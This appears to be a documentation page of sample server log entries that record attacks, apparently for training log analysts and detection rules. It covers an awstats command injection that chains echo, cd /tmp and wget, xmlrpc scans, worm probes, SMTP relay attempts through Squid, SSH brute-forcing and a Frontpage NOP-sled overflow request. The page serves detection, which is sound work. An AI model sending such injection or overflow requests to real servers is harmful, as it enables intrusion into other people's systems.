Samples of logs that contain information about attacks¶
Nessus scan entries in a web server log:¶
Latest application scans:¶
Apache entry with command execution succeeded:¶
a.b.c.d - - [13/Jan/2006:01:07:21 -0200] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget...;echo%20YYY;echo|HTTP/1.0" 404 291
Apache scan (looking for vulnerable applications):¶
..code-block:: console
100.149.117.1 - - [13/Jan/2006:01:03:30 -0200] “POST /blog/xmlrpc.php HTTP/1.0” 404 288
100.149.117.1 - - [13/Jan/2006:01:03:31 -0200] “POST /blog/xmlsrv/xmlrpc.php HTTP/1.0” 404 295
100.149.117.1 - - [13/Jan/2006:01:03:32 -0200] “POST /blogs/xmlsrv/xmlrpc.php HTTP/1.0” 404 296
100.149.117.1 - - [13/Jan/2006:01:03:33 -0200] “POST /drupal/xmlrpc.php HTTP/1.0” 404 290
Squid access log (worm scans):¶
524 192.168.2.204 TCP_MISS/404 590 GET http://www.ordendeslichts.de/intern/xxx3.php? - DIRECT/81.201.107.6 text/html
3571 192.168.2.204 TCP_MISS/404 470 GET http://www.levada.ru/htmlarea/images/xxx3.php? - DIRECT/62.118.252.213
1 192.168.2.204 TCP_NEGATIVE_HIT/404 487 GET http://ala-bg.net/444.php - NONE/- text/html
1 192.168.2.204 TCP_NEGATIVE_HIT/404 396 GET http://www.connectesl.com/444.php - NONE/- text/html
1 192.168.2.204 TCP_NEGATIVE_HIT/404 543 GET http://www.chilotitomarino.cl/444.php - NONE/- text/html
0 192.168.2.204 TCP_NEGATIVE_HIT/404 543 GET http://www.chilotitomarino.cl/444.php - NONE/- text/html
Squid proxy misuse – Attempt to proxy SMTP over the proxy:¶
0 192.168.2.135 TCP_DENIED/403 1382 CONNECT 65.54.245.104:25 - NONE/- text/html
2 192.168.2.135 TCP_DENIED/403 1378 CONNECT 4.79.181.14:25 - NONE/- text/html
0 192.168.2.135 TCP_DENIED/403 1390 GET http://www.ebay.com/ - NONE/- text/html
0 59.59.106.40 TCP_DENIED/403 1380 CONNECT 203.84.195.1:25 - NONE/- text/html
8 59.59.106.40 TCP_DENIED/403 1380 CONNECT 203.84.195.1:25 - NONE/- text/html
SSH bruteforce login:¶
Oct 2 01:13:19 host sshd[19618]: Illegal user test from ::ffff:69.10.144.194<br>
Oct 2 01:13:19 host sshd[19618]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!<br>
Oct 2 01:13:20 host sshd[19620]: Illegal user test from ::ffff:69.10.144.194<br>
Oct 2 01:13:20 host sshd[19620]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!<br>
Oct 2 01:13:22 host sshd[19622]: Illegal user test from ::ffff:69.10.144.194<br>
Oct 2 01:13:22 host sshd[19622]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!<br>
Oct 2 01:13:23 host sshd[19624]: Illegal user tester from ::ffff:69.10.144.194<br>
Oct 2 01:13:23 host sshd[19624]: Address 69.10.144.194 maps to unknown.rackforce.com, but this does not map back to the address - POSSIBLE BREAKIN ATTEMPT!<br>
Attempt to exploit Frontpage with payload truncated:¶
74.74.126.250 - - [02/Aug/2007:15:53:46 -0400] "SEARCH /\x90................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
............................................................................................................................
.....................................................................................\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9
0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 271
74.74.126.250 - - [02/Aug/2007:15:54:17 -0400] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 406 288